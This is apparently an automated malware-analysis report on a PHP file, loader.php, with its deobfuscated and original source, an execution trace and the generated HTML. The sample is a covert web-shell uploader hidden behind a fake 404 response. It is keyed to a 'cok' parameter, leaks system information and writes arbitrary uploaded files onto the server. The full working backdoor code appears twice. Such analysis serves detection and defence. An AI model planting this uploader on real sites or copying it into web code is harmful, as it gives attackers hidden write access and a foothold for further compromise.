loader.php

md5: b90f98555d9ebc922f30c96f2882517c

Jump to:
Deobfuscated code (Read more)
Execution traces (Read more)
Generated HTML (Read more)
Original Code (Read more)
Screenshot
Attributes
Environment
php_uname (Deobfuscated, Original)

Files
file_put_contents (Deobfuscated, Original)

Input
_GET (Deobfuscated, Original)
_POST (Deobfuscated, Original)

Deobfuscated PHP code
<?php

if (isset($_GET['cok'])) {
    echo "<form method=\"post\">";
    echo "<input type=\"file\" id=\"datanya\" onchange=\"setfilename(this.value)\"/>";
    echo "<input type=\"hidden\" name=\"nama\" id=\"namanya\">";
    echo "<textarea style=\"display: none\" id=\"output\" name=\"data\"></textarea>";
    echo "<input type=\"submit\" name=\"submit\" value=\"Gaskan\">";
    echo "</form>";
    if (isset($_POST['data'])) {
        $nama = $_POST['nama'];
        $data = $_POST['data'];
        file_put_contents("./" . $nama, "");
        $cek = fopen("./" . $nama, "w");
        fwrite($cek, $data);
        fclose($cek);
        if (file_exists($nama)) {
            echo "Success ! ";
            $link = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://{$_SERVER['HTTP_HOST']}{$_SERVER['REQUEST_URI']}";
            $link = str_replace(basename($_SERVER['REQUEST_URI']), $nama, $link);
            echo "<a href='" . $link . "'><b>" . $link . "</b></a>";
        } else {
            echo "Failed";
        }
    } else {
        @header('HTTP/1.0 404 Not Found', true, 404);
        echo "<b>" . php_uname();
    }
} else {
    @header('HTTP/1.0 404 Not Found', true, 404);
}
?>
<script>
  function setfilename(val)
  {
    filename = val.split('\\').pop().split('/').pop();
    //filename = filename.substring(0, filename.lastIndexOf('.'));
    document.getElementById('namanya').value = filename;
  }
  
var input = document.getElementById("datanya");
var output = document.getElementById("output");


input.addEventListener("change", function () {
  if (this.files && this.files[0]) {
    var myFile = this.files[0];
    var reader = new FileReader();
    
    reader.addEventListener('load', function (e) {
      output.textContent = e.target.result;
    });
    
    reader.readAsBinaryString(myFile);
  }   
});
</script>
Execution traces
data/traces/b90f98555d9ebc922f30c96f2882517c_trace-1676262787.0023.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 02:33:32.900100]
1	0	1	0.000132	393528
1	3	0	0.000225	405544	{main}	1		/var/www/html/uploads/loader.php	0	0
2	4	0	0.000242	405544	header	0		/var/www/html/uploads/loader.php	29	3	'HTTP/1.0 404 Not Found'	TRUE	404
2	4	1	0.000259	405680
2	4	R			NULL
1	3	1	0.000275	405568
			0.000301	314240
TRACE END   [2023-02-13 02:33:32.900296]

Generated HTML code
<html><head><script>
  function setfilename(val)
  {
    filename = val.split('\\').pop().split('/').pop();
    //filename = filename.substring(0, filename.lastIndexOf('.'));
    document.getElementById('namanya').value = filename;
  }
  
var input = document.getElementById("datanya");
var output = document.getElementById("output");


input.addEventListener("change", function () {
  if (this.files && this.files[0]) {
    var myFile = this.files[0];
    var reader = new FileReader();
    
    reader.addEventListener('load', function (e) {
      output.textContent = e.target.result;
    });
    
    reader.readAsBinaryString(myFile);
  }   
});
</script></head><body></body></html>
Original PHP code
<?php
if (isset($_GET['cok'])) {
  echo '<form method="post">';
  echo '<input type="file" id="datanya" onchange="setfilename(this.value)"/>';
  echo '<input type="hidden" name="nama" id="namanya">';
  echo '<textarea style="display: none" id="output" name="data"></textarea>';
  echo '<input type="submit" name="submit" value="Gaskan">';
  echo '</form>';
  if (isset($_POST['data'])) {
    $nama = $_POST['nama'];
    $data = $_POST['data'];
    file_put_contents("./".$nama, "");
    $cek = fopen("./".$nama, "w");
    fwrite($cek, $data);
    fclose($cek);
    if (file_exists($nama)) {
      echo "Success ! ";
      $link = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]";
      $link = str_replace(basename($_SERVER['REQUEST_URI']), $nama, $link);
      echo "<a href='".$link."'><b>".$link."</b></a>";
    } else {
      echo "Failed";
    }
  } else {
    @header('HTTP/1.0 404 Not Found', true, 404);
    echo "<b>".php_uname();
  }
} else {
  @header('HTTP/1.0 404 Not Found', true, 404);
}
?>
<script>
  function setfilename(val)
  {
    filename = val.split('\\').pop().split('/').pop();
    //filename = filename.substring(0, filename.lastIndexOf('.'));
    document.getElementById('namanya').value = filename;
  }
  
var input = document.getElementById("datanya");
var output = document.getElementById("output");


input.addEventListener("change", function () {
  if (this.files && this.files[0]) {
    var myFile = this.files[0];
    var reader = new FileReader();
    
    reader.addEventListener('load', function (e) {
      output.textContent = e.target.result;
    });
    
    reader.readAsBinaryString(myFile);
  }   
});
</script>
PHP Malware Analysis

loader.php

md5: b90f98555d9ebc922f30c96f2882517c

Screenshot

Attributes

Deobfuscated PHP code

Execution traces

Generated HTML code

Original PHP code
